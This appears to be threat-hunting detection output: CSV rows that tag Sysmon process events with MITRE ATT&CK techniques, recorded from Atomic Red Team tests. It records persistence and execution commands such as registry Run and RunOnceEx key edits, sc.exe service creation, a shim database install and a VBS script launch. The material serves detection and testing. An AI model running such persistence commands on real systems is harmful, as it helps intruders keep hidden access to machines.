+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028585.172729,2019-03-20T00:49:45.172729+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966423
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:49:45.052
+ 365ABB72-55E9-5C91-0000-00102EEB0700
+ 2104
+ C:\Windows\System32\sdbinst.exe
+ 6.0.7600.16385 (win7_rtm.090713-1255)
+ Application Compatibility Database Installer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB "
+ C:\Windows\System32\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
+ 365ABB72-551C-5C91-0000-001030590500
+ 2704
+ C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
+ "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547519.48325,2019-07-19T18:45:19.483250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3606
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:45:06.251
+ 747F3D96-D772-5D31-0000-00107CF02800
+ 324
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547506.213488,2019-07-19T18:45:06.213488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3603
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:45:06.180
+ 747F3D96-D772-5D31-0000-001031EB2800
+ 6472
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547506.137175,2019-07-19T18:45:06.137175+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " C:\Path\AtomicRedTeam.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3600
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:45:06.056
+ 747F3D96-D772-5D31-0000-0010BEE52800
+ 3216
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " C:\Path\AtomicRedTeam.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547506.075725,2019-07-19T18:45:06.075725+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3599
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:44:53.388
+ 747F3D96-D765-5D31-0000-001024C32800
+ 4264
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547493.349171,2019-07-19T18:44:53.349171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG DELETE " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /f" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3596
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:44:53.314
+ 747F3D96-D765-5D31-0000-0010D7BD2800
+ 5824
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "REG DELETE " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /f"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553037534.182862,2019-03-20T03:18:54.182862+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966634
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 23:13:38.586
+ 365ABB72-77A2-5C91-0000-00100A570100
+ 1636
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-777F-5C91-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-777F-5C91-0000-00100B590000
+ 516
+ C:\Windows\System32\services.exe
+ C:\Windows\system32\services.exe
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553037534.172848,2019-03-20T03:18:54.172848+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966633
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 23:13:38.576
+ 365ABB72-77A2-5C91-0000-00106D560100
+ 1628
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-777F-5C91-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-777F-5C91-0000-00100B590000
+ 516
+ C:\Windows\System32\services.exe
+ C:\Windows\system32\services.exe
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547493.258049,2019-07-19T18:44:53.258049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG ADD " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3593
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:44:53.201
+ 747F3D96-D765-5D31-0000-001027B72800
+ 6584
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "REG ADD " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547466.222431,2019-07-19T18:44:26.222431+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3588
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:44:09.337
+ 747F3D96-D739-5D31-0000-0010B2C22600
+ 6896
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547449.278042,2019-07-19T18:44:09.278042+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe delete AtomicTestService" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3585
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:44:09.225
+ 747F3D96-D739-5D31-0000-0010E4BB2600
+ 4744
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "sc.exe delete AtomicTestService"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547449.17604,2019-07-19T18:44:09.176040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe stop AtomicTestService" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3583
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:44:09.142
+ 747F3D96-D739-5D31-0000-00104CB72600
+ 5000
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "sc.exe stop AtomicTestService"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1543 ] Sc.exe manipulating windows services,1563547448.307214,2019-07-19T18:44:08.307214+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe start AtomicTestService) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService") in directory : ( C:\AtomicRedTeam\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3581
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Persistence or Exec - Services Management
+ 2019-07-19 14:44:08.269
+ 747F3D96-D738-5D31-0000-0010D8AA2600
+ 4260
+ C:\Windows\System32\sc.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Service Control Manager Configuration Tool
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ sc.exe start AtomicTestService
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF
+ 747F3D96-D738-5D31-0000-001056A62600
+ 2556
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547448.288861,2019-07-19T18:44:08.288861+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3580
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:44:08.227
+ 747F3D96-D738-5D31-0000-001056A62600
+ 2556
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1543 ] Sc.exe manipulating windows services,1563547448.221461,2019-07-19T18:44:08.221461+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe") in directory : ( C:\AtomicRedTeam\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3577
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Persistence or Exec - Services Management
+ 2019-07-19 14:44:08.181
+ 747F3D96-D738-5D31-0000-001098A22600
+ 1700
+ C:\Windows\System32\sc.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Service Control Manager Configuration Tool
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF
+ 747F3D96-D738-5D31-0000-001046A02600
+ 4216
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547448.185344,2019-07-19T18:44:08.185344+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3576
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:44:08.146
+ 747F3D96-D738-5D31-0000-001046A02600
+ 4216
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553031677.339046,2019-03-20T01:41:17.339046+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966563
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 21:41:17.288
+ 365ABB72-61FD-5C91-0000-0010536A1200
+ 2340
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\cmd.EXE /c malwr.vbs
+ C:\Windows\system32\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-528D-5C91-0000-001062560000
+ 484
+ C:\Windows\System32\services.exe
+ C:\Windows\system32\services.exe
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3574
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:43:03.271
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell
+ c:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-D6ED-5D31-0000-0010C88A2500
+ 3764
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3574
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:43:03.271
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell
+ c:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-D6ED-5D31-0000-0010C88A2500
+ 3764
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547383.303217,2019-07-19T18:43:03.303217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3573
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:42:53.277
+ 747F3D96-D6ED-5D31-0000-0010C88A2500
+ 3764
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
